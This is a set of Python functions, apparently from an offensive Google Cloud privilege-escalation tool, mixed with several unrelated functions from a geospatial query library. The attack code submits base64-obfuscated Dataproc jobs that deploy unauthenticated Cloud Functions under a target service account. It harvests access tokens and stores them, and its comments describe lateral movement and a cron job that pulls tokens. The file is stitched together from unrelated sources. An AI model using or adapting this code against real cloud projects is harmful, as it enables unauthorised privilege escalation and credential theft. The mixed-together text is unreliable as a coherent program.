def dataproc_privesc(dest_proj, latest_cf, func_details): cluster_name = utils.random_name() utils.run_gcloud_command_local( "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform --metadata cf_name={},evilpassword={}" .format(cluster_name, func_details["name"], func_details["evil_password"])) spark_string = "import subprocess\n\nimport os\n\nos.system(\"mkdir /tmp/base_cloud_function && echo \\\"" spark_string += b64encode(latest_cf.encode("utf-8")).decode("utf-8") spark_string += "\\\" | base64 -d > /tmp/base_cloud_function/main.py\")" bash_string = """#!/bin/bash PROJECT=$(gcloud config get-value project) PROJECT_NUMBER=$(gcloud projects list --filter="$PROJECT" --format="value(PROJECT_NUMBER)") DEST_SA="[email protected]" INSTANCE_ID=$(curl http://metadata.google.internal/computeMetadata/v1/instance/id -H "Metadata-Flavor: Google") ZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H "Metadata-Flavor: Google") CF_NAME=$(gcloud compute instances describe $INSTANCE_ID --zone $ZONE --format='value[](metadata.items.cf_name)') CF_PASSWORD=$(gcloud compute instances describe $INSTANCE_ID --zone $ZONE --format='value[](metadata.items.evilpassword)') gcloud services enable cloudfunctions.googleapis.com gcloud functions deploy $CF_NAME --set-env-vars=EVIL_PASSWORD=$CF_PASSWORD --timeout 540 --trigger-http --allow-unauthenticated --source /tmp/base_cloud_function --runtime python37 --entry-point hello_world --service-account $DEST_SA""" spark_string += "\n\nos.system(\"/bin/bash -c \\\"base64 -d <<< " spark_string += b64encode(bash_string.encode("utf-8")).decode("utf-8") spark_string += " | /bin/bash\\\"\")" print(spark_string) with open("/tmp/sparkjob.py", "w+") as f: f.write(spark_string) utils.run_gcloud_command_local( "gcloud dataproc jobs submit pyspark --cluster {} /tmp/sparkjob.py --region us-central1" .format(cluster_name)) utils.run_gcloud_command_local( "gcloud dataproc clusters delete {} --region us-central1 --quiet". format(cluster_name))
def recurse(self, sign): name = utils.random_name() statement = self._statement named_area = self._named_areas operation = self._operation.copy() operation.update({name: [self._name, sign, None]}) return Statement(name, statement, operation, named_area)
def __init__(self, coords, out): """ :param name: name of area :param coords: list of coords tupples (lon,lat) """ self.coords = coords self.out = out self._name = utils.random_name()
def dataproc(source_name=None, project=None, refresh=False): cluster_name = utils.random_name() if not source_name: caller_identity = utils.run_gcloud_command_local( "gcloud auth print-identity-token") creator_email = "" utils.run_gcloud_command_local( "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform" .format(cluster_name)) raw_output = utils.run_gcloud_command_local( "gcloud dataproc jobs submit pyspark --cluster {} dataproc_job.py --region us-central1" .format(cluster_name)) utils.run_gcloud_command_local( "gcloud dataproc clusters delete {} --region us-central1 --quiet". format(cluster_name)) else: source = db_session.query( models.CloudObject).filter_by(name=source_name).first() caller_identity = source.identity creator_email = source.serviceAccount run_cmd_on_source( source_name, "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform" .format(cluster_name), project) raw_output = run_cmd_on_source( source_name, "gcloud dataproc jobs submit pyspark --cluster {} dataproc_job.py --region us-central1" .format(cluster_name), project) run_cmd_on_source( source_name, "gcloud dataproc clusters delete {} --region us-central1 --quiet". format(cluster_name), project) print(raw_output) for line in raw_output.split("\n"): if "access_token" in line: token = json.loads(line) if not refresh: fun_cloud_function = models.CloudObject( project=project, role="editor", serviceAccount=token["service_account"], evilPassword="******", name=cluster_name, cred=token["access_token"], creator_identity=caller_identity, creator_email=creator_email, infastructure="dataproc", identity=token["identity"]) db_session.add(fun_cloud_function) db_session.commit() return fun_cloud_function else: refresh.cred = token["access_token"] db_session.add(refresh) db_session.commit() return refresh
def _constructor(cls, typ, area, tags=None, name=None): if name is None: name = utils.random_name() if isinstance(area, Statement): return cls(name, {name: [typ, area._name, tags]}, named_area=area._statement) elif isinstance(area, Area): return cls(name, {name: [typ, area._name, tags]}, named_area={area._name: [typ, area, None]}) else: statement = {name: [typ, area, tags]} return cls(name, statement)
def deploy_notebook(project, source=None, target=None, bucket=None, role="unknown", bucketproj=None): # Create instance via notebook notebooks in default network # SSH commands via vm for lateral movementa # cron job pulls token every minute and pushes up utils.run_gcloud_command_local( "gcloud config set project {}".format(project)) instance_props = {"name": utils.random_name()} if not target: target = "{}@appspot.gserviceaccount.com".format(project) role = "editor" if not source: utils.run_gcloud_command_local( "gcloud services enable cloudresourcemanager.googleapis.com") caller_identity = utils.run_gcloud_command_local( "gcloud auth print-identity-token") success = base_notebook.create_notebook_in_another_project( project, target, instance_props, bucket) if not success or success == "False": print("Failed to provision VM") return False creator_email = "" else: source = db_session.query( models.CloudObject).filter_by(name=source).first() source.refresh_cred(db_session, utils.run_gcloud_command_local, dataproc=dataproc, bucket_name=bucket, bucket_proj=bucketproj) caller_identity = source.identity token = source.cred proc = activate_sketch_proxy(token) utils.run_gcloud_command_local( "gcloud services enable cloudresourcemanager.googleapis.com") success = base_notebook.create_notebook_in_another_project( project, target, instance_props, bucket) deactivate_sketch_proxy(proc) if not success or success == "False": print("Failed to provision dataflow notebook VM") return False creator_email = source.serviceAccount fun_notebook_instance = models.CloudObject( project=project, role=role, serviceAccount=target, evilPassword="", name=instance_props["name"], cred="", creator_identity=caller_identity, creator_email=creator_email, infastructure="notebook", identity="") db_session.add(fun_notebook_instance) db_session.commit() print("successfully privesced the {} identitiy".format(target)) return fun_notebook_instance
def deploy_cf(project, source=None, target=None, role="unknown", bucket=None, bucketproj=None): with open("./base_cloud_function/main.py") as f: latest_cf = f.read() utils.run_gcloud_command_local( "gcloud config set project {}".format(project)) function_props = { "name": utils.random_name(), "evil_password": utils.random_name() } if not target: target = "{}@appspot.gserviceaccount.com".format(project) role = "editor" if not source: utils.run_gcloud_command_local( "gcloud services enable cloudresourcemanager.googleapis.com") caller_identity = utils.run_gcloud_command_local( "gcloud auth print-identity-token") success = base_cf.create_gcf_in_another_project( project, target, latest_cf, function_props) if not success or success == "False": print("Failed to provision CF") return False creator_email = "" else: source = db_session.query( models.CloudObject).filter_by(name=source).first() source.refresh_cred(db_session, utils.run_gcloud_command_local, dataproc=dataproc, bucket_name=bucket, bucket_proj=bucketproj) caller_identity = source.identity token = source.cred proc = activate_sketch_proxy(token) utils.run_gcloud_command_local( "gcloud services enable cloudresourcemanager.googleapis.com") success = base_cf.create_gcf_in_another_project( project, target, latest_cf, function_props) deactivate_sketch_proxy(proc) if not success or success == "False": print("Failed to provision CF") return False creator_email = source.serviceAccount fun_cloud_function = models.CloudObject( project=project, role=role, serviceAccount=target, evilPassword=function_props["evil_password"], name=function_props["name"], cred="", creator_identity=caller_identity, creator_email=creator_email, infastructure="cloud_function", identity="") db_session.add(fun_cloud_function) db_session.commit() print("successfully privesced the {} identitiy".format(target)) return fun_cloud_function
def _operation(self, other, sign): name = utils.random_name() named_area = {**self._named_areas, **other._named_areas} statement = {**self._statement, **other._statement} operation = Statement._make_operation(self, other, name, sign) return name, named_area, statement, operation